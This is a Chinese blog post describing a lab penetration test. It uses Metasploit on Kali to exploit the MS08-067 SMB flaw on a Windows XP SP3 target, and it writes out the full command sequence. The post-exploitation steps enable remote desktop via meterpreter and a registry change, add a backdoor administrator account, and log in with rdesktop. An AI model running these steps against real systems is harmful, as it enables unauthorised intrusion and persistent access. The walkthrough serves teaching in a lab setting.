zoukankan      html  css  js  c++  java
  • Defense:综合攻防渗透实验

    实验环境

    Windows XP SP3

    IP:172.16.211.129

    百度网盘:https://pan.baidu.com/s/1dbBGdkM6aDzXcKajV47zBw     靶机环境

     

    Kali Linux 2.0

    IP:172.16.211.128

    实验原理

    漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞(MS08-067)此安全更新解决了服务器服务中一个秘密报告的漏洞。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。

    在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。

    防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

    Kali 启动metasploit服务

     kali linux 2.0 本身已内置metasploit,kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用。

    kali 2.0中启动带数据库支持的msf方式

    #首先启动postgresql数据库
    /etc/init.d/postgresql start;
    或者 
    service postgresql start;
    
    #初始化MSF数据库(关键步骤!)
    msfdb init;
    
    #运行msfconsole
    msfconsole;
    
    #在msf中查看数据库连接状态
    db_status
    
    #将postgresql数据库设置开机自启
    update-rc.d postgresql enable

     漏洞利用过程

    在msfconsole使用 search 命令搜索MS08067漏洞攻击程序

     

    从结果中得到  exploit/windows/smb/ms08_067_netapi

    表示当前msf框架中包含MS08067漏洞的攻击插件。

     

    使用use命令调用MS08067漏洞攻击程序

    #进入msf的交互式命令窗口
    use exploit/windows/smb/ms08_067_netapi

    查看需要设置的选项

    #查看设置选项
    show options


     

    从图中可以看到还需设置RHOST(目标地址)、Exploit target(攻击目标)

     

    使用 set 命令设置 Module Options

    #设置目标IP即 
    set rhost 172.16.211.129

    使用show options 命令查看设置情况

    从中可以看出目标IP已经设置好了,接着设置Exploit target,使用show targets 查看可选项可以看出以下版本的系统均存在此漏洞。

    因为实例演示的XP系统为WinXP SP3 简体中文版对应的编号为34

    使用set target 命令设置目标

    #设置目标
    set target 34

     

    使用exploit 或者 run 命令进行攻击

    #进行攻击
    exploit 
    或者
    run

    执行命令后得到一个meterpreter命令行交互窗口

     

    打开RDP(远程桌面)服务

    #打开远程服务 端口3389(meterpreter命令行交互窗口执行命令)
    run getgui -e

    进入CMD窗口

    #进入cmd窗口
    shell

     

    在cmd命令下也可以通过添加注册表项的方式开启对方远程桌面服务如果上面已经开启了,这步可以省略)。

    #开启远程服务
    REG ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections" /t REG_DWORD /d 00000000 /f

    查看端口是否开放

    #查看端口状态
    netstat -ano

     

    查看XP系统中的用户

    #查看系统中用户
    net user

     

    添加账户和管理员权限

    #添加用户
    格式一
    net user user pass /add   
    例如:net user gao 123 /add
    
    格式二
    net localgroup administrators /add  
    例如:net localgroup administrators gao /add  

    用本机Ka li 远程访问目标主机(利用新建的用户)

    rdesktop -a 32 -u gao -p 123 172.16.211.129:3389

    完成Windows XP SP3系统侵入!!

  • 相关阅读:
    【UWP】使用Action代替Command
    【UWP】在不同类库使用ResourceDictionaries
    【UWP】不通过异常判断文件是否存在
    【UWP】批量修改图标尺寸
    【UWP】FlipView绑定ItemsSource,Selectedindex的问题
    【UWP】UI适配整理
    【iOS】Object-C注释
    【iOS】desctiption和debugDescription
    【iOS】关联属性存取数据
    【iOS】配置和使用静态库
  • 原文地址:https://www.cnblogs.com/nhdlb/p/14178026.html
Copyright © 2011-2022 走看看